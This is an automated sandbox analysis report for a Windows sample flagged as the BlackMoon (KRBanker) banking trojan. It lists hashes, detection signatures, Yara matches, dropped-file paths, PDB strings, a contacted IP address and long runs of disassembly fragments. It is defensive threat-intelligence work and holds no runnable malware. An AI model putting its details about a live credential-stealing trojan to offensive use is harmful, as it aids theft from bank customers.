Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1734098836319.exe

Overview

General Information

Sample name:1734098836319.exe
Analysis ID:1583248
MD5:b2524709c9b62c107eaa1235db37cbdb
SHA1:798cbea0bbe9b23462be4c5e8a3743399cd529d5
SHA256:e40b03e684f2db354aabacfc64cdaaaff31d27e844febf87c9af66cd39d74989
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

BlackMoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected BlackMoon Ransomware
AI detected suspicious sample
Contains functionality to inject threads in other processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses known network protocols on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 1734098836319.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\1734098836319.exe" MD5: B2524709C9B62C107EAA1235DB37CBDB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
KrBanker, BlackMoonThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dllJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dllMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
    • 0x306bc:$s1: blackmoon
    • 0x306fc:$s2: BlackMoon RunTime Error:

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
      00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
        00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
          00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
            00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.3.1734098836319.exe.3273080.25.raw.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
                0.3.1734098836319.exe.3273080.25.raw.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
                • 0x306bc:$s1: blackmoon
                • 0x306fc:$s2: BlackMoon RunTime Error:
                0.2.1734098836319.exe.32f0000.8.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
                  0.2.1734098836319.exe.32f0000.8.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
                  • 0x306bc:$s1: blackmoon
                  • 0x306fc:$s2: BlackMoon RunTime Error:
                  0.2.1734098836319.exe.676c1f.1.raw.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
                    Click to see the 17 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: 1734098836319.exeAvira: detected
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dllReversingLabs: Detection: 47%
                    Multi AV Scanner detection for submitted file
                    Source: 1734098836319.exeVirustotal: Detection: 70%Perma Link
                    Source: 1734098836319.exeReversingLabs: Detection: 76%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dllJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: 1734098836319.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0047C367 CryptHashData,CryptGetHashParam,0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004145B5 CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,CryptReleaseContext,0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004145B5 CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,CryptReleaseContext,0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004154F3 CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,0_2_004154F3
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00415BEB CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptGetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,0_2_00415BEB
                    Source: 1734098836319.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 39.103.20.61:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: Binary string: C:\Users\BLACK\Desktop\E_Loader 1.0\Release\E_Loader.pdb source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2954098082.0000000010000000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: \InfinityHookPro-main\infinity_hook_pro\x64\Debug\infinity_hook_pro.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \win10 32-64\kmclass32_64_release\kmclass32_64_release\kmclass\x64\Debug\kmclass.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 1734098836319.exe, 00000000.00000003.1746048706.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953896278.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 1734098836319.exe, 00000000.00000003.1746048706.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953896278.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: ).pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \x64\Debug\Dultx64_win10_FH.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \x64\Win7Debug\MKDriver.pdb source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: .pdbk source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp, 1734098836319.exe, 00000000.00000002.2954098082.0000000010014000.00000040.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004CF160 FindClose,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,0_2_004CF160
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0045616B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00450181
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00450181
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00450181
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_00440195
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_00440195
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_00440195
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-48h], esp0_2_00440195
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_00440195
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004842EF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0047E392
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0040A535
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0040A535
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0040A535
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0040A535
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0040A535
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_0040A535
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_0040A535
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00454585
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00454585
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0040480F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-50h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00404C1A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040ACF0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040ACF0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_00402DBB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_00402DBB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_00454EF8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-00000090h], esp0_2_00401326
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-00000090h], esp0_2_00401326
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-00000094h], esp0_2_00401326
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-00000090h], esp0_2_00401326
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-00000090h], esp0_2_00401326
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0047F559
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_00403765
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_00403765
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_00403765
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_00439A44
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_00439A44
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_00439A44
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_00439A44
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_00439A44
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00403A0C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00403A0C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00403A0C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00403A0C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00403A0C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00403A0C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00463ADB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00463ADB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040BB11
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040BB11
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040BB11
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040BB11
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040BB11
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0041BB94
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0041BB94
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0041BB94
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0041BB94
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0041BB94
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00455EF4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0043FF2B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0040BFD2
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0040BFD2
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0040BFD2
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0040BFD2
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0043A058
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0045606E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004B0060
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_004AC064
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_004AC064
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_004AC064
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049E07A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_004BC00A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00454027
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B80D8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004540DD
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004560EE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049C08F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004560AE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-7Ch], esp0_2_004BA0A6
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_004BA0A6
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004400B3
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040E173
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040E173
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040E173
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0040E173
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0043E178
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004A212F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004A212F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0041C12B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0041C12B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0040A136
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0040A136
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0040A136
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0046413F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004B6134
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0045A1D8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0040C1F1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004641F5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049C1F3
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004A418E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00442196
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004561B4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004561B4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_00460247
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_00460247
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_00460247
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_00460247
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_00460247
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0048224C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0048224C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-48h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_00478272
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0042827E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0042827E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0042827E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_004C2209
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004C0202
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-74h], esp0_2_004C0202
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-74h], esp0_2_004C0202
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_004C0202
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-74h], esp0_2_004C0202
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_0040421D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040421D
